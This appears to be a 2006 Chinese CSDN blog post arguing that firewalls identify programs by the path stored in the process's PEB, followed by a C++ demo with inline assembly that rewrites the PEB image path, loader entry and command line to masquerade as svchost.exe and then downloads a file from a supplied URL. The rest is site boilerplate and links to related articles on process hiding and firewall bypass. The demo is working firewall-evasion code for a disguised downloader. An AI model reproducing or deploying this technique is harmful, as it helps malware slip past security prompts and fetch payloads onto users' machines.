防火墙普遍存在的设计缺陷--关于进程路径的获取

最新推荐文章于 2024-07-17 15:00:16 发布
最新推荐文章于 2024-07-17 15:00:16 发布
阅读量1.8k 收藏
点赞数
分类专栏: 病毒安全 C++/ASM 文章标签: 防火墙 path parameters null user 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RonCha/article/details/1254982
版权

作者:RonCha
主页:http://blog.csdn.net/RonCha/
当程序访问网络时,一般情况下防火墙都会获取到程序的路径,并提示用户。
问题就出在获取程序路径的方法,一般的防火墙程序都是直接在ring3下获取这些信息,也就是说防火墙程序获取的这些信息,基本上是程序的PEB中存放的信息。如果我们修改了程序的PEB中相关的路径的信息的话,把程序修改伪装为系统进程的路径的话,防火墙就无法正确识别了。

DEMO代码如下,如需更完整的信息请与我联系:

//  fuckdown.cpp : Defines the entry point for the console application.
 //
//   [9/19/2006 RonCha]
#include  " stdafx.h "
#include  < urlmon.h >
#pragma  comment(lib,"urlmon.lib")

char  szpath[MAX_PATH] = {0} ;
OLECHAR path[MAX_PATH] = {0} ;


 void  ChangPath();

 int  main( int  argc,  char *  argv[])
 {

    //修改路径
    ChangPath();
    if (argc==3)
    {
         if (argv[1]!="" && argv[2]!="")
         {
            HRESULT hRet=URLDownloadToFileA(NULL,argv[1],argv[2],NULL,NULL);
            if(hRet==S_OK)
                printf(" Down Success! ");
            else
                printf(" Can't down the file! ");
            return 1;
         }
    }
    printf("Author:RonCha ");
    printf("Web:http://blog.csdn.net/RonCha ");
    printf("Usage:fuckdown.exe downurl savepath ");
    return 0;
}

void  ChangPath()
 {
    //将该进程伪装为svchost.exe
    int slen;
    slen=GetSystemDirectory(szpath,MAX_PATH);
    slen=GetSystemDirectory(szpath,slen);
    lstrcat(szpath,"/svchost.exe");
    //转化为Unicode字符
    MultiByteToWideChar(CP_ACP,NULL,szpath,-1,path,MAX_PATH);
    __asm
    {            
            MOV EAX, fs:[30h]            //get the PEB address
            MOV EAX, [EAX+0xC]             //_PEB_LDR_DATA
            MOV EAX, [EAX+0xC]             //InLoadOrderModuleList
            lea ebx,path
            mov WORD ptr[EAX+0x24],0x60  //FullDllName->Length
            mov [EAX+0x28],ebx             //FullDllName->Buffer
            MOV EAX, fs:[30h]
            mov EAX,[EAX+0x10]           //peb->_RTL_USER_PROCESS_PARAMETERS 
            lea EAX,[EAX+0x3c]             //_RTL_USER_PROCESS_PARAMETERS ->ImagePathName->Buffer
            lea ebx,path
            mov [eax],ebx                 //ImagePathName->Buffer
            mov WORD ptr[eax-4],0x60     //ImagePathName->Length
            MOV EAX, fs:[30h]
            mov EAX,[EAX+0x10]           //peb->_RTL_USER_PROCESS_PARAMETERS 
            lea eax,[EAX+0x44]             //_RTL_USER_PROCESS_PARAMETERS -> CommandLine->Buffer
            lea ebx,path
            mov [eax],ebx                //CommandLine-->Buffer
            mov WORD ptr[eax-4],0x60    //CommandLine-->Length
    }
}

 

RonCha
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
2022全国职业技能大赛-网络安全赛题解析总结①(超详细)
Aluxian_的博客
05-11 1万+
2022全国职业技能大赛-网络安全赛题解析总结(自己得思路)模块A 基础设施设置与安全加固(20分)模块B 网络安全事件响应、数字取证调查和应用安全(40分)模块C CTF夺旗-攻击(20分)模块D CTF夺旗-防御(20分) 模块A 基础设施设置与安全加固(20分) 一、项目和任务描述: 假定你是某企业的网络安全工程师,对于企业的服务器系统,根据任务要求确保各服务正常运行,并通过综合运用登录安全加固、数据库安全策略、流量完整性策略、事件监控策略、防火墙策略、IP协议安全配置等多种安全策略来提升服务器系
通过 PEB 改变进程名,实现“穿透”防火墙
01-12 1993
PEB(Process Environment Block)——进程环境块,存放进程信息,每个进程都有自己的 PEB 信息。在 Win 2000 下,进程环境块的地址对于每个进程来说是固定的,在 0x7FFDF000 处,这是用户区内存,所以程序能够直接访问。准确的 PEB 地址应从系统的 EPROCESS 结构的 1b0H 偏移处获得,但由于 EPROCESS 在进程的核心内存区,所以程序不能直
Ring3 下隐藏进程
10-10 2496
library nthide;usesWindows,ImageHlp,TlHelp32;type SYSTEM_INFORMATION_CLASS = (SystemBasicInformation,SystemProcessorInformation,SystemPerformanceInformation,SystemTimeOfDayInformation,SystemNotImpleme
最新隐藏进程 RING3实现方式:hook ZwQuerySystemInformation 隐藏进程 在XP里测试通过
aq782645210的专栏
11-14 3498
研究其他作者写的文章,也是hook ZwQuerySystemInformation 隐藏进程,可是我怎么测试都没有通过,不能隐藏进程,在网上也试了其他隐藏进程的代码,也不行。唉,那就只有自己动手啦~~~ 既然hook ZwQuerySystemInformation 可以隐藏进程,我就拿它刀了。首先声明,本人只是业余编程者,代码不好看的地方请多包涵。 经过反复测试,终于找到了关键处: wh
由于不可识别问题,windows无法显示windows防火墙设置
weixin_34150224的博客
01-18 949
由于不可识别问题,windows无法显示windows防火墙设置 1.在 服务 列表控制面板中不显示 Windows 防火墙 / Internet 连接共享 (ICS) 。 2.在 服务 列表, 显示 Windows 防火墙 / Internet 连接共享 (ICS) 但无法启动此服务 3.当您尝试访问 Windows 防火墙设置收到以下错误信息:...
关于进程路径获取---防火墙普遍存在设计缺陷
07-08 567
防火墙普遍存在设计缺陷--关于进程路径获取     当程序访问网络时,一般情况下防火墙都会获取到程序的路径,并提示用户。问题就出在获取程序路径的方法,一般的防火墙程序都是直接在ring3下获取这些信息,也就是说防火墙程序获取的这些信息,基本上是程序的PEB中存放的信息。如果我们修改了程序的PEB中相关的路径的信息的话,把程序修改伪装为系统进程路径的话,防火墙就无法正确识别了。DEMO
linux中的防火墙的基本设置---firewlld、iptables
热门推荐
ly2020_的博客
06-05 2万+
1 防火墙介绍: 1.1 防火墙的分类 (一)、包过滤防火墙 数据包过滤(packet Filtering)技术是在网络层对数据包进行选择,选择的依据是系统内设置的过滤逻辑,称为访问控制表(access control lable,ACL)。通过检查数据流中每个数据包的源地址和目的地址,所用的端口号和协议状态等因素,或他们的组合来确定是否允许该数据包通过。 包过滤防火墙的优点是它对用户来说是透明的...
RocketMQ--Dledger集群搭建
L2111533547的博客
07-01 4642
引言:一直以来,在多地多中心的消息发送场景下,如何保障数据的完整性和一致性是一个技术难点。Dledger 作为一个轻量级的 Java Library,它的作用就是将 Raft 有关于算法方面的内容全部抽象掉,开发人员只需要关心业务即可在 RocketMQ 4.5 版本之前,RocketMQ 只有 Master/Slave 一种部署方式,一组 broker 中有一个 Master ,有零到多个 Slave,Slave 通过同步复制或异步复制的方式去同步 Master 数据。Master/Slave 部署模式,
Privilege_Escalation
04-13
特权升级是网络安全中的一个重要概念,它是指攻击者在获取了系统或网络的初始访问权限后,通过利用漏洞、配置错误或设计缺陷,进一步提升自己的权限,达到控制整个系统或者访问敏感数据的目的。在Linux、Windows以及...
multiCCL_f
10-19
本程序可能存在某些缺陷,  及其他可能隐含的问题,  使用中可能造成的一切后果,均由使用者自行负责。 如果您对此很在意则请勿使用。 ;感谢您的测试,使用中请保留软件文档的完整,发现任何问题请到NE365的BBS...
软件病毒特征码定位软件multiCCL
08-02
本程序可能存在某些缺陷,  及其他可能隐含的问题,  使用中可能造成的一切后果,均由使用者自行负责。 如果您对此很在意则请勿使用。 ;感谢您的测试,使用中请保留软件文档的完整,发现任何问题请到NE365的BBS...
网络安全技术测试卷.docx
06-09
本文就TCP/IP协议自身所存在的安全问题和协议守护进程进行了详细讨论,指出针对这些安全隐患的攻击。 TCP协议的安全问题 TCP使用三次握手机制来建立一条连接,握手的第一个报文为SYN包;第二个报文为SYN/ACK包,表明...
暗组虚拟主机提权专用
04-17
"提权"是指攻击者通过利用系统漏洞或者设计缺陷,从低权限账户获取到管理员级别的权限,从而能够控制整个系统。在这个场景中,"专用"可能意味着这种提权方法是特别针对虚拟主机环境定制的,这通常涉及到对特定的...
27_MobileNetV3网络详解
https://github.com/foxpup11?tab=repositories
07-17 810
https://www.bilibili.com/video/BV1GK4y1p7uE/?spm_id_from=333.999.0.0&vd_source=7dace3632125a1ef7fd32c285eb2fbac
RTI DDS大数据碎片
qq_33089547的博客
07-17 971
PublicationBuiltingTopicData或SubscriptionBuiltnTopicData样本较大的最常见原因是序列化的TypeCode或TypeObject,但您也可能发送了大量属性(通过7.5.19 PROPERTY QosPolicy(DDS扩展))或具有较大的ContentFilteredTopic筛选器表达式,以及其他大小可变的字段,这可能会导致样本大小较大。如果您尝试发送一个大小大于MTU的DDS样本,但尚未设置DDS级碎片,您将看到IP级碎片。
Internet 控制报文协议 —— ICMPv4 和 ICMPv6 详解
u013669912的博客
07-17 882
计算机网络技术期末复习
最新发布
CWPIN21的博客
07-17 1031
本文深入探讨了计算机网络的核心概念与关键技术。涵盖了网络拓扑结构,如星型、总线型和环形等,分析了它们的特点与适用场景。详细阐述了 TCP/IP 协议栈的工作原理,包括 IP 地址分配、子网掩码的作用以及路由选择算法。还探讨了网络安全方面的常见威胁,如病毒、黑客攻击等,并介绍了相应的防护措施。通过实例,让读者对计算机网络有更全面、深入的理解。
PAN-OS管理员指南:防火墙配置和管理
2. 防火墙集成:详细介绍如何将防火墙集成到管理网络中,包括防火墙的安装、配置、管理等。 3. 管理策略:讲解如何确定管理策略,包括安全策略、网络策略、应用策略等。 4. 执行初始配置:指导管理员如何执行初始...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值